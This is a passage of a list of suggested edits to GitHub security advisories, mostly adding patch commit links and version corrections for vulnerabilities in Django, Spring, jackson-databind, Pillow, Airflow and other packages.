https://tomcat.apache.org/security-10.html shows patch in 10.x.
=> [GHSA-m7jv-hq7h-mq7c] Infinite Loop in Apache Tomcat

advisories/github-reviewed/2024/02/GHSA-xrj7-x7gp-wwqr/GHSA-xrj7-x7gp-wwqr.json
**Updates**
**Comments**
solr-solrj is affected - without this tools will not detect solr-solrj as affected
=> [GHSA-xrj7-x7gp-wwqr] Apache Solr's Streaming Expressions allow users to extract data from other Solr Clouds

advisories/github-reviewed/2022/05/GHSA-2x9h-h3c4-wqqh/GHSA-2x9h-h3c4-wqqh.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2016-9299.
https://www.jenkins.io/security/advisory/2016-11-16/#remote-code-execution-vulnerability-in-remoting-module shows it is related to SECURITY-360.
=> [GHSA-2x9h-h3c4-wqqh] Improper Neutralization of Special Elements used in an LDAP Query in Jenkins

advisories/github-reviewed/2022/05/GHSA-6rh5-23hx-j452/GHSA-6rh5-23hx-j452.json
**Updates**
**Comments**
Add source code location related to CVE-2019-1003003.
=> [GHSA-6rh5-23hx-j452] Improper Authorization in Jenkins Core

advisories/github-reviewed/2018/12/GHSA-27xw-p8v6-9jjr/GHSA-27xw-p8v6-9jjr.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2018-15801.
=> [GHSA-27xw-p8v6-9jjr] Spring Security vulnerable to Authorization Bypass

advisories/github-reviewed/2022/05/GHSA-f866-m9mv-2xr3/GHSA-f866-m9mv-2xr3.json
**Updates**
- References
**Comments**
Add patch link and source code location related to CVE-2011-2894.
=> [GHSA-f866-m9mv-2xr3] Spring Framework and Spring Security vulnerable to Deserialization of Untrusted Data

advisories/github-reviewed/2022/05/GHSA-vpr3-f594-mg5g/GHSA-vpr3-f594-mg5g.json
**Updates**
- References
**Comments**
Add source code link and patch link related to CVE-2010-1622.
=> [GHSA-vpr3-f594-mg5g] Improper Control of Generation of Code ('Code Injection') in Spring Framework

advisories/github-reviewed/2022/05/GHSA-34fp-xvxp-rg22/GHSA-34fp-xvxp-rg22.json
**Updates**
- References
**Comments**
Add source code location and patch links related to CVE-2012-6551.
=> [GHSA-34fp-xvxp-rg22] Apache ActiveMQ default configuration subject to denial of service

advisories/github-reviewed/2021/12/GHSA-wh8g-3j2c-rqj5/GHSA-wh8g-3j2c-rqj5.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2020-35490.
=> [GHSA-wh8g-3j2c-rqj5] Serialization gadgets exploit in jackson-databind

advisories/github-reviewed/2019/10/GHSA-mx7p-6679-8g3q/GHSA-mx7p-6679-8g3q.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2019-16942.
=> [GHSA-mx7p-6679-8g3q] Polymorphic Typing in FasterXML jackson-databind

advisories/github-reviewed/2019/09/GHSA-h822-r4r5-v8jg/GHSA-h822-r4r5-v8jg.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2019-14540.
=> [GHSA-h822-r4r5-v8jg] Polymorphic Typing issue in FasterXML jackson-databind

advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2019-12814.
=> [GHSA-cmfg-87vq-g5g4] Deserialization of untrusted data in FasterXML jackson-databind

advisories/github-reviewed/2019/07/GHSA-mph4-vhrx-mv67/GHSA-mph4-vhrx-mv67.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2019-12384.
=> [GHSA-mph4-vhrx-mv67] Deserialization of Untrusted Data in FasterXML jackson-databind

advisories/github-reviewed/2019/05/GHSA-5ww9-j83m-q7qx/GHSA-5ww9-j83m-q7qx.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2019-12086.
=> [GHSA-5ww9-j83m-q7qx] Information exposure in FasterXML jackson-databind

advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json
**Updates**
- References
- Severity
**Comments**
Add patch link and source code location related to CVE-2018-19362.
=> [GHSA-c8hm-7hpq-7jhg] High severity vulnerability that affects com.fasterxml.jackson.core:jackson-databind

advisories/github-reviewed/2018/10/GHSA-h592-38cm-4ggp/GHSA-h592-38cm-4ggp.json
**Updates**
- References
**Comments**
Add one patch link related to CVE-2017-15095.
=> [GHSA-h592-38cm-4ggp] jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution

advisories/github-reviewed/2024/03/GHSA-5vcc-86wm-547q/GHSA-5vcc-86wm-547q.json
**Updates**
- References
**Comments**
added source repository and vulnerable code.
vulnerable code: 
https://github.com/jazzband/djangorestframework-simplejwt/blob/c791e987332ed5e22a86428160d6372b1d85ffae/rest_framework_simplejwt/tokens.py#L281
=> [GHSA-5vcc-86wm-547q] Improper Privilege Management in djangorestframework-simplejwt

advisories/github-reviewed/2018/10/GHSA-4fq3-mr56-cg6r/GHSA-4fq3-mr56-cg6r.json
**Updates**
- References
**Comments**
added fix commit ,jira reference
=> [GHSA-4fq3-mr56-cg6r] Spring Data Commons remote code injection vulnerability

advisories/github-reviewed/2024/03/GHSA-5925-88xh-6h99/GHSA-5925-88xh-6h99.json
**Updates**
- References
**Comments**
added references .
fix commit
=> [GHSA-5925-88xh-6h99] Authentication bypass via Cross site request forgery

advisories/github-reviewed/2020/07/GHSA-rvmq-4x66-q7j3/GHSA-rvmq-4x66-q7j3.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2020-11978 which fixed in multi-branches.
=> [GHSA-rvmq-4x66-q7j3] Remote code execution in Apache Airflow

advisories/github-reviewed/2020/12/GHSA-6r3p-fcvm-xh7c/GHSA-6r3p-fcvm-xh7c.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2020-17513.
=> [GHSA-6r3p-fcvm-xh7c] SSRF vulnerability in Arache Airflow

advisories/github-reviewed/2021/04/GHSA-86vp-x3pr-79rx/GHSA-86vp-x3pr-79rx.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2020-17515.
=> [GHSA-86vp-x3pr-79rx] Apache Airflow Cross-site scripting due to incomplete fix for CVE-2020-13944

advisories/github-reviewed/2021/04/GHSA-7mx5-x372-xh87/GHSA-7mx5-x372-xh87.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2020-17526.
=> [GHSA-7mx5-x372-xh87] Incorrect Session Validation in Apache Airflow

advisories/github-reviewed/2019/10/GHSA-j7mj-748x-7p78/GHSA-j7mj-748x-7p78.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2019-16865.
=> [GHSA-j7mj-748x-7p78] DOS attack in Pillow when processing specially crafted image files

advisories/github-reviewed/2021/11/GHSA-3xv8-3j54-hgrp/GHSA-3xv8-3j54-hgrp.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2020-10378.
=> [GHSA-3xv8-3j54-hgrp] Out-of-bounds read in Pillow

advisories/github-reviewed/2021/03/GHSA-p43w-g3c5-g5mq/GHSA-p43w-g3c5-g5mq.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2021-25293.
=> [GHSA-p43w-g3c5-g5mq] Out of bounds read in Pillow

advisories/github-reviewed/2020/06/GHSA-3gh2-xw74-jmcw/GHSA-3gh2-xw74-jmcw.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2020-9402.
=> [GHSA-3gh2-xw74-jmcw] SQL injection in Django

advisories/github-reviewed/2021/09/GHSA-xpfp-f569-q3p2/GHSA-xpfp-f569-q3p2.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2021-35042 which fixed in multi-branches.
=> [GHSA-xpfp-f569-q3p2] SQL Injection in Django

advisories/github-reviewed/2024/03/GHSA-5667-3wch-7q7w/GHSA-5667-3wch-7q7w.json
**Updates**
**Comments**
eclipse-vertx/vert.x#5082 fixes it for the 4.4 branch.
Fixes #4201
=> [GHSA-5667-3wch-7q7w] Eclipse Vert.x memory leak

advisories/github-reviewed/2022/03/GHSA-9j59-75qj-795w/GHSA-9j59-75qj-795w.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2022-24303.
=> [GHSA-9j59-75qj-795w] Path traversal in Pillow

advisories/github-reviewed/2022/01/GHSA-pw3c-h7wp-cvhx/GHSA-pw3c-h7wp-cvhx.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2022-22815.
=> [GHSA-pw3c-h7wp-cvhx] Improper Initialization in Pillow

advisories/github-reviewed/2021/03/GHSA-95q3-8gr9-gm8w/GHSA-95q3-8gr9-gm8w.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2021-27923.
=> [GHSA-95q3-8gr9-gm8w] Pillow Denial of Service by Uncontrolled Resource Consumption

advisories/github-reviewed/2021/03/GHSA-3wvg-mj6g-m9cv/GHSA-3wvg-mj6g-m9cv.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2021-27922.
=> [GHSA-3wvg-mj6g-m9cv] Pillow Uncontrolled Resource Consumption

advisories/github-reviewed/2021/03/GHSA-f4w8-cv6p-x6r5/GHSA-f4w8-cv6p-x6r5.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2021-27921.
=> [GHSA-f4w8-cv6p-x6r5] Pillow Denial of Service by Uncontrolled Resource Consumption

advisories/github-reviewed/2021/03/GHSA-hf64-x4gq-p99h/GHSA-hf64-x4gq-p99h.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2020-35655.
=> [GHSA-hf64-x4gq-p99h] Pillow Out-of-bounds Read

advisories/github-reviewed/2021/03/GHSA-vqcj-wrf2-7v73/GHSA-vqcj-wrf2-7v73.json
**Updates**
- References
**Comments**
Add patch link related to CVE-2020-35654.
=> [GHSA-vqcj-wrf2-7v73] Pillow Out-of-bounds Write

advisories/github-reviewed/2020/07/GHSA-cqhg-xjhh-p8hf/GHSA-cqhg-xjhh-p8hf.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2020-10177.
=> [GHSA-cqhg-xjhh-p8hf] Out-of-bounds reads in Pillow

advisories/github-reviewed/2022/05/GHSA-87vg-5pgx-pggh/GHSA-87vg-5pgx-pggh.json
**Updates**
- References
**Comments**
Add a patch https://github.com/spring-projects/spring-integration-extensions/commit/d10f537283d90eabd28af57ac97f860a3913bf9b, of which the commit message shows its motivation, coinciding with the cve desc.
=> [GHSA-87vg-5pgx-pggh] spring-integration-zip Arbitrary File Write

advisories/github-reviewed/2022/05/GHSA-wmhw-hpwh-44pg/GHSA-wmhw-hpwh-44pg.json
**Updates**
- References
**Comments**
Add a patch https://github.com/apache/activemq-apollo/commit/e5647554e6801a522c508a8eb457979a9af8c398, of which the commit message claims `https://issues.apache.org/jira/browse/APLO-366 - make xpath parser features configurable`
=> [GHSA-wmhw-hpwh-44pg] Apache ActiveMQ Apollo XXE Vulnerability

advisories/github-reviewed/2022/12/GHSA-3vqj-43w4-2q58/GHSA-3vqj-43w4-2q58.json
**Updates**
**Comments**
cn.hutool:hutool-json has been fixed in this release.
https://github.com/dromara/hutool/releases/tag/5.8.25
=> [GHSA-3vqj-43w4-2q58] json stack overflow vulnerability

advisories/github-reviewed/2024/04/GHSA-6363-v5m4-fvq3/GHSA-6363-v5m4-fvq3.json
**Updates**
**Comments**
Updated affected and patched versions.
=> [GHSA-6363-v5m4-fvq3] timber/timber vulnerable to Deserialization of Untrusted Data

advisories/github-reviewed/2022/05/GHSA-5wfp-8643-c58x/GHSA-5wfp-8643-c58x.json
**Updates**
- References
**Comments**
- **Commit for Resetting XMLBeans SAX Parser**
- `https://svn.apache.org/repos/asf/poi/trunk@1615781`
- Explanation: This commit includes a preventive measure to reset the XMLBeans SAX parser before the parsing of OOXML documents. This is to address the XML Entity Expansion (XEE) vulnerabilities that can cause denial of service (DoS) as per this cve. It also facilitates the activation of additional unit tests associated with bug #54764, enhancing the overall security against potential attacks.
- **Commit for Applying Security Suggestions by Uwe Schindler**
- `https://svn.apache.org/repos/asf/poi/trunk@1615720`
- Explanation: Adopts security improvements recommended by expert Uwe Schindler. This change strengthens the XML parsing process against the …
=> [GHSA-5wfp-8643-c58x] Improper Input Validation in Apache POI

advisories/github-reviewed/2024/04/GHSA-8m45-2rjm-j347/GHSA-8m45-2rjm-j347.json
**Updates**
- Summary
**Comments**
I am the maintainer. I changed this title in the GHSA before publishing it. Why was this change not reflected in the final advisory?
=> [GHSA-8m45-2rjm-j347] Title change

advisories/github-reviewed/2024/02/GHSA-whh8-fjgc-qp73/GHSA-whh8-fjgc-qp73.json
**Updates**
**Comments**
https://github.com/onnx/onnx/releases/tag/v1.16.0 lists CVE-2024-27318 as fixed
=> [GHSA-whh8-fjgc-qp73] Onnx Directory Traversal vulnerability

advisories/github-reviewed/2024/02/GHSA-h8wv-9h96-m4hr/GHSA-h8wv-9h96-m4hr.json
**Updates**
**Comments**
https://github.com/onnx/onnx/releases/tag/v1.16.0 lists CVE-2024-27319 as fixed
=> [GHSA-h8wv-9h96-m4hr] Onnx Out-of-bounds Read vulnerability

advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json
**Updates**
- References
**Comments**
Link to code commit for v8.5.x
=> [GHSA-r6j3-px5g-cq3x] Apache Tomcat Improper Input Validation vulnerability

advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json
**Updates**
- References
**Comments**
Added reference links to commits for the fix.
=> [GHSA-g8pj-r55q-5c2v] Apache Tomcat Incomplete Cleanup vulnerability

advisories/github-reviewed/2024/04/GHSA-vc6q-ccj9-9r89/GHSA-vc6q-ccj9-9r89.json
**Updates**
- References
**Comments**
This vulnerability was initially reported by @stypr, Original reference has been attached on the reference side.
=> [GHSA-vc6q-ccj9-9r89] MailDev Remote Code Execution

advisories/github-reviewed/2023/07/GHSA-jrfm-2h82-xg28/GHSA-jrfm-2h82-xg28.json
**Updates**
- Description
- Summary
**Comments**
This is just causing spam and is a totally bogus CVE.
See:
- https://github.com/scipy/scipy/issues/14713
- https://github.com/vin01/bogus-cves
=> [GHSA-jrfm-2h82-xg28] Use after free in SciPy

advisories/github-reviewed/2024/04/GHSA-84pr-m4jr-85g5/GHSA-84pr-m4jr-85g5.json
The issue was fixed in `flask-cors` 4.0.1
Refs:
- https://github.com/corydolphin/flask-cors/pull/351
=> [GHSA-84pr-m4jr-85g5] Add fixed version

advisories/github-reviewed/2022/05/GHSA-pgxh-wfw4-jx2v/GHSA-pgxh-wfw4-jx2v.json
**Updates**
- References
**Comments**
add a patch for v1.8.x:
https://github.com/django/django/commit/2eb86b01d7b59be06076f6179a454d0fd0afaff6
=> [GHSA-pgxh-wfw4-jx2v] Django denial of service via empty session record creation

advisories/github-reviewed/2022/05/GHSA-6wgp-fwfm-mxp3/GHSA-6wgp-fwfm-mxp3.json
**Updates**
- References
**Comments**
add patch commit: https://github.com/django/django/commit/31cb25adecba930bdeee4556709f5a1c42d88fd6
=> [GHSA-6wgp-fwfm-mxp3] Django allows user sessions hijacking via an empty string in the session key

advisories/github-reviewed/2022/05/GHSA-7fq8-4pv5-5w5c/GHSA-7fq8-4pv5-5w5c.json
**Updates**
- References
**Comments**
add 4 patch commits:
https://github.com/django/django/commit/2342693b31f740a422abf7267c53b4e7bc487c1b
https://github.com/django/django/commit/5510f070711540aaa8d3707776cd77494e688ef9
https://github.com/django/django/commit/2a4113dbd532ce952308992633d802dc169a75f1
https://github.com/django/django/commit/770427c2896a078925abfca2317486b284d22f04
=> [GHSA-7fq8-4pv5-5w5c] Django cross-site scripting (XSS) attack via user-supplied redirect URLs

advisories/github-reviewed/2018/10/GHSA-5hg3-6c2f-f3wr/GHSA-5hg3-6c2f-f3wr.json
**Updates**
- References
**Comments**
add 3 patches:
https://github.com/django/django/commit/d6eaee092709aad477a9894598496c6deec532ff
https://github.com/django/django/commit/6fffc3c6d420e44f4029d5643f38d00a39b08525
https://github.com/django/django/commit/c4e5ff7fdb5fce447675e90291fd33fddd052b3c
=> [GHSA-5hg3-6c2f-f3wr] Django open redirect

advisories/github-reviewed/2018/10/GHSA-rf4j-j272-fj86/GHSA-rf4j-j272-fj86.json
**Updates**
- References
**Comments**
add 2 patches:
https://github.com/django/django/commit/57b95fedad5e0b83fc9c81466b7d1751c6427aae
https://github.com/django/django/commit/c37bb28677295f6edda61d8ac461014ef0d3aeb2
=> [GHSA-rf4j-j272-fj86] Django Information leakage in AuthenticationForm

advisories/github-reviewed/2019/01/GHSA-9r8w-6x8c-6jr9/GHSA-9r8w-6x8c-6jr9.json
**Updates**
- References
**Comments**
add 2 patches:
https://github.com/django/django/commit/58e08e80e362db79eb0fd775dc81faad90dca47a
https://github.com/django/django/commit/e35a0c56086924f331e9422daa266e907a4784cc
=> [GHSA-9r8w-6x8c-6jr9] Django vulnerable to XSS on 500 pages

advisories/github-reviewed/2019/01/GHSA-h4hv-m4h4-mhwg/GHSA-h4hv-m4h4-mhwg.json
**Updates**
- References
**Comments**
add 3 patches:
https://github.com/django/django/commit/4a6b945dffe8d10e7cec107d93e6efaebfbded29
https://github.com/django/django/commit/5f1ffb07afc1e59729ce2b283124116d6c0659e4
https://github.com/django/django/commit/2a9f6ef71b8e23fd267ee2be1be26dde8ab67037
=> [GHSA-h4hv-m4h4-mhwg] Django open redirect

advisories/github-reviewed/2022/05/GHSA-3f2c-jm6v-cr35/GHSA-3f2c-jm6v-cr35.json
**Updates**
- References
**Comments**
add 3 patches:
https://github.com/django/django/commit/c401ae9a7dfb1a94a8a61927ed541d6f93089587
https://github.com/django/django/commit/45acd6d836895a4c36575f48b3fb36a3dae98d19
https://github.com/django/django/commit/884e113838e5a72b4b0ec9e5e87aa480f6aa4472
=> [GHSA-3f2c-jm6v-cr35] Django DNS Rebinding Vulnerability

advisories/github-reviewed/2022/05/GHSA-mv8g-fhh6-6267/GHSA-mv8g-fhh6-6267.json
**Updates**
- References
**Comments**
add 3 patches:
https://github.com/django/django/commit/70f99952965a430daf69eeb9947079aae535d2d0
https://github.com/django/django/commit/4844d86c7728c1a5a3bbce4ad336a8d32304072b
https://github.com/django/django/commit/34e10720d81b8d407aa14d763b6a7fe8f13b4f2e
=> [GHSA-mv8g-fhh6-6267] Django user with hardcoded password created when running tests on Oracle

advisories/github-reviewed/2022/05/GHSA-crhm-qpjc-cm64/GHSA-crhm-qpjc-cm64.json
**Updates**
- References
**Comments**
add 2 patches:
https://github.com/django/django/commit/6118ab7d0676f0d622278e5be215f14fb5410b6a
https://github.com/django/django/commit/d1bc980db1c0fffd6d60677e62f70beadb9fe64a
=> [GHSA-crhm-qpjc-cm64] Django CSRF Protection Bypass

advisories/github-reviewed/2022/05/GHSA-fp6p-5xvw-m74f/GHSA-fp6p-5xvw-m74f.json
**Updates**
- References
**Comments**
add two patches:
https://github.com/django/django/commit/f4e6e02f7713a6924d16540be279909ff4091eb6
https://github.com/django/django/commit/af7d09b0c5c6ab68e629fd9baf736f9dd203b18e
=> [GHSA-fp6p-5xvw-m74f] Django User Enumeration Vulnerability

advisories/github-reviewed/2022/05/GHSA-pw27-w7w4-9qc7/GHSA-pw27-w7w4-9qc7.json
**Updates**
- References
**Comments**
add two patches:
https://github.com/django/django/commit/382ab137312961ad62feb8109d70a5a581fe8350
https://github.com/django/django/commit/fc6d147a63f89795dbcdecb0559256470fff4380
=> [GHSA-pw27-w7w4-9qc7] Django XSS Vulnerability

advisories/github-reviewed/2022/05/GHSA-46x4-9jmv-jc8p/GHSA-46x4-9jmv-jc8p.json
**Updates**
- References
**Comments**
add patch:
https://github.com/django/django/commit/adbca5e4db42542575734b8e5d26961c8ada7265
=> [GHSA-46x4-9jmv-jc8p] Django Access Restrictions Bypass 

advisories/github-reviewed/2023/06/GHSA-w44m-8mv2-v78h/GHSA-w44m-8mv2-v78h.json
**Updates**
- Description
**Comments**
This entry should be deleted, as it is a copy of GHSA-j2cr-jc39-wpx5
=> [GHSA-w44m-8mv2-v78h] Cosmos "Barberry" vulnerability in github.com/cosmos/cosmos-sdk

advisories/github-reviewed/2023/02/GHSA-q2jf-h9jm-m7p4/GHSA-q2jf-h9jm-m7p4.json
**Updates**
- References
**Comments**
add three patch commits:
https://github.com/django/django/commit/9d7bd5a56b1ce0576e8e07a8001373576d277942
https://github.com/django/django/commit/4452642f193533e288a52c02efb5bbc766a68f95
https://github.com/django/django/commit/c7e0151fdf33e1b11d488b6f67b94fdf3a30614a
the commit msg shows it aimed at fixing this cve.
=> [GHSA-q2jf-h9jm-m7p4] Django contains Uncontrolled Resource Consumption via cached header

advisories/github-reviewed/2022/02/GHSA-6cw3-g6wv-c2xv/GHSA-6cw3-g6wv-c2xv.json
**Updates**
- References
**Comments**
add a patch https://github.com/django/django/commit/f9c7d48fdd6f198a6494a9202f90242f176e4fc9 for v4.0.x
=> [GHSA-6cw3-g6wv-c2xv] Infinite Loop in Django

advisories/github-reviewed/2024/05/GHSA-4h8f-2wvx-gg5w/GHSA-4h8f-2wvx-gg5w.json
**Updates**
- References
**Comments**
https://github.com/bcgit/bc-java/issues/1656#issuecomment-2102247464
=> [GHSA-4h8f-2wvx-gg5w] Bouncy Castle Java Cryptography API vulnerable to DNS poisoning

advisories/github-reviewed/2022/04/GHSA-c2cp-3xj9-97w9/GHSA-c2cp-3xj9-97w9.json
**Updates**
**Comments**
Add version suffix to more accurately describe the range of affected versions.
=> [GHSA-c2cp-3xj9-97w9] Denial of service in Spring Security OAuth2

advisories/github-reviewed/2019/06/GHSA-mmf6-6597-3v6m/GHSA-mmf6-6597-3v6m.json
**Updates**
**Comments**
Add version suffix to more accurately describe the range of affected versions.
=> [GHSA-mmf6-6597-3v6m] Open Redirect in Spring Security OAuth

advisories/github-reviewed/2018/10/GHSA-7q9c-h23x-65fq/GHSA-7q9c-h23x-65fq.json
**Updates**
**Comments**
https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITYOAUTH-31345
=> [GHSA-7q9c-h23x-65fq] Spring Security OAuth vulnerable to remote code execution (RCE) via specially crafted request using whitelabel views

advisories/github-reviewed/2018/10/GHSA-rrpm-pj7p-7j9q/GHSA-rrpm-pj7p-7j9q.json
**Updates**
**Comments**
https://sca.analysiscenter.veracode.com/vulnerability-database/security/remote-code-execution-rce-/java/sid-6268/summary
=> [GHSA-rrpm-pj7p-7j9q] Spring Security OAuth vulnerable to remote code execution (RCE)

advisories/github-reviewed/2022/05/GHSA-qfr3-323w-qv27/GHSA-qfr3-323w-qv27.json
**Updates**
**Comments**
Add the .beta2 suffix to describe the affected version more accurately.
=> [GHSA-qfr3-323w-qv27] Possible information disclosure inside TreeGrid component with default data provider

advisories/github-reviewed/2021/04/GHSA-42j4-733x-5vcf/GHSA-42j4-733x-5vcf.json
**Updates**
**Comments**
Add version suffix .beta1 to describe the affected version more accurately.
=> [GHSA-42j4-733x-5vcf] Regular expression denial of service (ReDoS) in EmailValidator class in Vaadin 7

advisories/github-reviewed/2020/09/GHSA-v35c-49j6-q8hq/GHSA-v35c-49j6-q8hq.json
**Updates**
**Comments**
Add `.RELEASE` suffix for a more accurate description of the affected version.
=> [GHSA-v35c-49j6-q8hq] Security Constraint Bypass in Spring Security

advisories/github-reviewed/2021/12/GHSA-945q-ch46-pchg/GHSA-945q-ch46-pchg.json
**Updates**
**Comments**
According to [Patch](https://github.com/spring-projects/spring-amqp/commit/bde294d62a8b7f3f1d5a9f50f862c6f0782efb9d), this patch was introduced between 2.2.19.RELEASE and 2.2.20.RELEASE.
=> [GHSA-945q-ch46-pchg] Deserialization of Untrusted Data in Spring AMQP

advisories/github-reviewed/2023/02/GHSA-6c25-cxcc-pmc4/GHSA-6c25-cxcc-pmc4.json
**Updates**
**Comments**
Reported to OSV.dev via https://github.com/google/osv.dev/issues/2195
=> [GHSA-6c25-cxcc-pmc4] Dromara hutool vulnerable to SQL Injection

advisories/github-reviewed/2022/05/GHSA-6g95-x6cj-mg4v/GHSA-6g95-x6cj-mg4v.json
**Updates**
- References
**Comments**
add two patches:
https://github.com/django/django/commit/d7a06ee7e571b6dad07c0f5b519b1db02e2a476c
https://github.com/django/django/commit/bcfb47780ce7caecb409a9e9c1c314266e41d392
for v1.6 and v1.7
=> [GHSA-6g95-x6cj-mg4v] Django database denial-of-service with ModelMultipleChoiceField

advisories/github-reviewed/2022/05/GHSA-rw75-m7gp-92m3/GHSA-rw75-m7gp-92m3.json
**Updates**
- References
**Comments**
add three patches for v1.4, v1.5 and v1.6:
https://github.com/django/django/commit/027bd348642007617518379f8b02546abacaa6e0
https://github.com/django/django/commit/2a446c896e7c814661fb9c4f212b071b2a7fa446
https://github.com/django/django/commit/f7c494f2506250b8cb5923714360a3642ed63e0f
=> [GHSA-rw75-m7gp-92m3] Django data leakage via querystring manipulation in admin

advisories/github-reviewed/2018/07/GHSA-3jqw-crqj-w8qw/GHSA-3jqw-crqj-w8qw.json
**Updates**
- References
**Comments**
add 2 patches :
https://github.com/django/django/commit/7268f8af86186518821d775c530d5558fd726930	v1.2
https://github.com/django/django/commit/1a76dbefdfc60e2d5954c0ba614c3d054ba9c3f0	v1.3
=> [GHSA-3jqw-crqj-w8qw] Moderate severity vulnerability that affects django

advisories/github-reviewed/2018/07/GHSA-5j2h-h5hg-3wf8/GHSA-5j2h-h5hg-3wf8.json
**Updates**
- References
**Comments**
add 2 patches:
https://github.com/django/django/commit/408c5c873ce1437c7eee9544ff279ecbad7e150a	v1.1
https://github.com/django/django/commit/818e70344e7193f6ebc73c82ed574e6ce3c91afc	v1.2
=> [GHSA-5j2h-h5hg-3wf8] Moderate severity vulnerability that affects django

advisories/github-reviewed/2023/09/GHSA-ppjh-xp5v-46wc/GHSA-ppjh-xp5v-46wc.json
**Updates**
- References
**Comments**
https://github.com/schollz/croc/pull/697
=> [GHSA-ppjh-xp5v-46wc] Croc sender may send dangerous new files to receiver

advisories/github-reviewed/2023/09/GHSA-hp56-xvf4-g6wr/GHSA-hp56-xvf4-g6wr.json
**Updates**
- References
**Comments**
https://github.com/schollz/croc/pull/699
=> [GHSA-hp56-xvf4-g6wr] Cros secrets may be disclosed to untrusted relay

advisories/github-reviewed/2023/09/GHSA-7mp6-929p-pqhj/GHSA-7mp6-929p-pqhj.json
**Updates**
- References
**Comments**
https://github.com/schollz/croc/pull/700
=> [GHSA-7mp6-929p-pqhj] Croc requires senders to provide local IP addresses in cleartext

advisories/github-reviewed/2023/09/GHSA-8c8w-f7wp-2jr2/GHSA-8c8w-f7wp-2jr2.json
**Updates**
- References
**Comments**
https://github.com/schollz/croc/pull/698
=> [GHSA-8c8w-f7wp-2jr2] Sender can cause a receiver to overwrite files during ZIP extraction in Croc

advisories/github-reviewed/2018/07/GHSA-7wph-fc4w-wqp2/GHSA-7wph-fc4w-wqp2.json
**Updates**
- References
**Comments**
add two patches: https://github.com/django/django/commit/7f8dd9cbac074389af8d8fd235bf2cb657227b9a
https://github.com/django/django/commit/d5d8942a160685c403d381a279e72e09de5489a9
=> [GHSA-7wph-fc4w-wqp2] Moderate severity vulnerability that affects django

advisories/github-reviewed/2022/05/GHSA-r5cj-wv24-92p5/GHSA-r5cj-wv24-92p5.json
**Updates**
- References
**Comments**
add 3 ptaches: 
https://github.com/django/django/commit/44debfeaa4473bd28872c735dd3d9afde6886752
https://github.com/django/django/commit/aee48854a164382c655acb9f18b3c06c3d238e81
https://github.com/django/django/commit/7e0972bded362bc4b851c109df2c8a6548481a8e
=> [GHSA-r5cj-wv24-92p5] Django cross-site request forgery (CSRF) vulnerability

advisories/github-reviewed/2022/05/GHSA-mwv2-398h-v489/GHSA-mwv2-398h-v489.json
**Updates**
- References
**Comments**
add a patch https://github.com/django/django/commit/e89f0a65581f82a5740bfe989136cea75d09cd67
=> [GHSA-mwv2-398h-v489] Django Improper Access Control

advisories/github-reviewed/2022/07/GHSA-64x4-9hc6-r2h6/GHSA-64x4-9hc6-r2h6.json
**Updates**
**Comments**
Adding missing Python and Java packages, reported to us via https://github.com/google/osv.dev/issues/2024
=> [GHSA-64x4-9hc6-r2h6] Microsoft: CBC Padding Oracle in Azure Blob Storage Encryption Library

advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json
**Updates**
- References
**Comments**
Added reference link to the fix commit.
=> [GHSA-wjxj-5m7g-mg7q] Bouncy Castle Denial of Service (DoS)

advisories/github-reviewed/2023/11/GHSA-wpfc-r5qq-7r7p/GHSA-wpfc-r5qq-7r7p.json
**Updates**
**Comments**
The Package name is incorrect. It is recommended to change it to "/io.jenkins.plugins/neuvector-vulnerability-scanner". Reference source: https://mvnrepository.com/artifact/io.jenkins.plugins/neuvector-vulnerability-scanner You can see the Maven coordinates here
=> [GHSA-wpfc-r5qq-7r7p] Jenkins NeuVector Vulnerability Scanner Plugin Cross-Site Request Forgery vulnerability

advisories/github-reviewed/2020/06/GHSA-p66x-2cv9-qq3v/GHSA-p66x-2cv9-qq3v.json
**Updates**
**Comments**
According to apache/commons-beanutils@62e82ad92cf4818709d6044aaf257b73d42659a4, this patch was introduced between 1.9.3 and 1.9.4.
=> [GHSA-p66x-2cv9-qq3v] Arbitrary code execution in Apache Commons BeanUtils

advisories/github-reviewed/2020/06/GHSA-ffvq-7w96-97p7/GHSA-ffvq-7w96-97p7.json
**Updates**
**Comments**
https://nvd.nist.gov/vuln/detail/CVE-2018-15756#range-11766803
=> [GHSA-ffvq-7w96-97p7] Denial of Service in Spring Framework

advisories/github-reviewed/2024/06/GHSA-m5vv-6r4h-3vj9/GHSA-m5vv-6r4h-3vj9.json
**Updates**
- References
**Comments**
Add commits for the Azure Identity libraries for .NET and Java
=> [GHSA-m5vv-6r4h-3vj9] Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability

advisories/github-reviewed/2024/05/GHSA-23qq-p4gq-gc2g/GHSA-23qq-p4gq-gc2g.json
**Updates**
**Comments**
